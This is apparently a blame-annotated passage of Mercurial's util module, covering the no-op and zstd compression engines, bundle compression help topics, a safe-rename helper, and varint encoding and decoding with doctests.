    def compressstream(self, it, opts=None):
        # Nothing to do: hand the chunk iterator back untouched.
        return it

    def decompressorreader(self, fh):
        # Nothing to do: the file object already yields the raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never offers a compressed form.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines.register(_noopengine())
Pierre-Yves David
changegroup: move all compressions utilities in util...
r26266
Gregory Szorc
util: implement zstd compression engine...
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
        except ImportError:
            return None
        return zstd

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        """Yield zstd-compressed chunks for the chunks produced by ``it``.

        ``opts`` may carry a ``level`` entry; 3 is used when it is absent.
        """
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = (opts or {}).get('level', 3)

        packer = self._module.ZstdCompressor(level=level).compressobj()
        for piece in it:
            out = packer.compress(piece)
            # Only forward calls that actually produced output.
            if out:
                yield out

        yield packer.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            # Slice sizes used when feeding data piecewise.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Return ``data`` zstd-compressed, or None if that doesn't help.

            None is returned for inputs shorter than 50 bytes and whenever
            the compressed form is not smaller than the input.
            """
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            if insize <= 1000000:
                packed = self._cctx.compress(data)
                return packed if len(packed) < insize else None

            # Larger inputs are fed to a compression object slice by slice.
            packer = self._cctx.compressobj()
            step = self._compinsize
            pieces = []
            for start in range(0, insize, step):
                out = packer.compress(data[start:start + step])
                if out:
                    pieces.append(out)
            pieces.append(packer.flush())

            if sum(map(len, pieces)) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            """Return the decompressed ``data``.

            Any exception raised while decompressing is reported as
            ``error.StorageError``.
            """
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                unpacker = self._dctx.decompressobj()
                step = self._decompinsize
                pieces = []
                for start in range(0, insize, step):
                    out = unpacker.decompress(data[start:start + step])
                    if out:
                        pieces.append(out)
                # Frame should be exhausted, so no finish() API.

                return ''.join(pieces)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
Gregory Szorc
util: implement zstd compression engine...
r30442 compengines.register(_zstdengine())
Gregory Szorc
util: document bundle compression...
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    topics = {}
    for enginename in compengines:
        engine = compengines[enginename]

        # Leave out engines that cannot be used in this installation.
        if not engine.available():
            continue

        # Leave out engines without a user-facing bundle name.
        bundleinfo = engine.bundletype()
        if not bundleinfo or not bundleinfo[0]:
            continue
        specname = bundleinfo[0]

        # NOTE(review): the whitespace after ``\n`` is reproduced as seen;
        # the extraction may have collapsed it -- confirm against upstream.
        doc = b'``%s``\n %s' % (specname, pycompat.getdoc(engine.bundletype))

        entry = docobject()
        entry.__doc__ = pycompat.sysstr(doc)
        # Keep the untouched docstring and the function it came from.
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype

        topics[specname] = entry

    return topics
FUJIWARA Katsunori
i18n: get translation entries for description of each compression engines...
r33819 i18nfunctions = bundlecompressiontopics().values()
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244 # convenient shortcut
dst = debugstacktrace
Mark Thomas
util: add safename function for generating safe names to rename to...
r34555
def safename(f, tag, ctx, others=None):
    """
    Pick a name that ``f`` can safely be renamed to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    The result has the form oldname~tag[~number]: it does not exist in the
    provided context and is not in the set of other names. The plain
    oldname~tag is tried first, then number counts up from 1.
    """
    taken = set() if others is None else others
    plain = '%s~%s' % (f, tag)
    numbered = ('%s~%s~%s' % (f, tag, n) for n in itertools.count(1))
    for candidate in itertools.chain([plain], numbered):
        if candidate in ctx or candidate in taken:
            continue
        return candidate
Boris Feld
util: move 'readexactly' in the util module...
r35772
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    got = len(data)
    if got >= n:
        return data
    # Short read: report how much arrived versus how much was requested.
    raise error.Abort(_("stream ended unexpectedly"
                       " (got %d bytes, expected %d)")
                      % (got, n))
Gregory Szorc
util: implement varint functions...
r35773
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    encoded = []
    while True:
        # Peel off the lowest 7 bits; what is left decides whether this
        # is the final byte (no continuation bit) or not.
        group = value & 0x7f
        value >>= 7
        if not value:
            encoded.append(pycompat.bytechr(group))
            break
        encoded.append(pycompat.bytechr(0x80 | group))

    return ''.join(encoded)
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    # Each byte contributes 7 bits, least significant group first.
    for shift in itertools.count(0, 7):
        byte = ord(readexactly(fh, 1))
        value |= (byte & 0x7f) << shift
        # A clear high bit marks the last byte of the varint.
        if not (byte & 0x80):
            return value